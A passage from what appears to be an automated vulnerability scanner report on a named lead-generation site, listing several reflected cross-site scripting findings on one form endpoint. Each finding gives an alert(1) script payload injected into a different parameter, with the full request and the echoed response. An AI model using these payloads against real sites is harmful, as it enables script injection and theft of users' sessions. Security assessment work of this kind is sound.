ller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503
...[SNIP]...

3.15. http://forms.vendorseek.com/controller [ff parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ff request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664d5"><script>alert(1)</script>3b882b3290a was submitted in the ff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:03 GMT
Connection: close
Set-Cookie: JSESSIONID=D4E6A869C34C0515772463B8F903AFA7.app5-all2; Path=/
Set-Cookie: JSESSIONID=3F1FA27067DA4510556969041BAC1E45.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033283753; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
ntroller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc20355
...[SNIP]...

3.16. http://forms.vendorseek.com/controller [ft parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe09b"><script>alert(1)</script>af5e37d2a1b was submitted in the ft parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:41 GMT
Connection: close
Set-Cookie: JSESSIONID=CB81F1344536AB31354E44561D4ECF4F.app5-all1; Path=/
Set-Cookie: JSESSIONID=E26210974A283F4E16B64A40FE650495.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033261045; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw
...[SNIP]...

3.17. http://forms.vendorseek.com/controller [hidepriv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the hidepriv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db25f"><script>alert(1)</script>07c88f93aad was submitted in the hidepriv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:24 GMT
Connection: close
Set-Cookie: JSESSIONID=9427C5800EA81EBA82796AA5B99BE117.app5-all2; Path=/
Set-Cookie: JSESSIONID=023303D1ACD45B160E9D80D905189D67.app5-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033304656; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/
Content-Length: 4121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.18. http://forms.vendorseek.com/controller [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85097"><script>alert(1)</script>380b955c126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1 HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:30 GMT
Connection: close
Set-Cookie: JSESSIONID=9337A9AC4E07168705285D65BB671B4E.app6-all1; Path=/
Set-Cookie: JSESSIONID=CD6559A73D367EA093FA9CB0A8987F49.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033310902; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/
Content-Length: 3817

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
10Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1" Type="hidden"/>
...[SNIP]...

3.19. http://forms.vendorseek.com/controller [sdw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the sdw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131e9"><script>alert(1)</script>2aceb244d19 was submitted in the sdw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:08 GMT
Connection: close
Set-Cookie: JSESSIONID=FCEB432FD39F7053DA305F3F1C7D4797.app6-all1; Path=/
Set-Cookie: JSESSIONID=2BF6FECB1787CEC337E007BF3CE19A56.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033288544; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=2012
...[SNIP]...

3.20. http://forms.vendorseek.com/controller [segid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the segid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47aa6"><script>alert(1)</script>17f7ae3a145 was submitted in the segid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:07 GMT
Connection: close
Set-Cookie: JSESSIONID=534417FF5679B259D78F3527F3B5F9FF.app6-all2; Path=/
Set-Cookie: JSESSIONID=AC3E67B01F08CE42EC4FAA382CAE04FE.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033287262; Expires=Sat, 16-Feb-2019 12:48:07 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
ault&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=47aa6"><script>alert(1)</script>17f7ae3a145&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180
...[SNIP]...

3.21. http://forms.vendorseek.com/controller [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f10"><script>alert(1)</script>4df01fa89ff was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:09 GMT
Connection: close
Set-Cookie: JSESSIONID=CE0040EAA12C8C817879FC115BC89A90.app6-all1; Path=/
Set-Cookie: JSESSIONID=B9D35294ACC0F93628BE2F3A67EAE738.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033289912; Expires=Sat, 16-Feb-2019 12:48:09 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
p://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=truec3f10"><script>alert(1)</script>4df01fa89ff&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=201235192036
...[SNIP]...

3.22. http://forms.vendorseek.com/controller [spage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the spage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac565"><script>alert(1)</script>dea5f51ae06 was submitted in the spage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac565"><script>alert(1)</script>dea5f51ae06&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:02 GMT
Connection: close
Set-Cookie: JSESSIONID=9BAE8A9D6F92A1B449A843C6BAE0AE52.app6-all1; Path=/
Set-Cookie: JSESSIONID=DC8610B9DC97ABB633D752123FC11C7C.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033282568; Expires=Sat, 16-Feb-2019 12:48:02 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
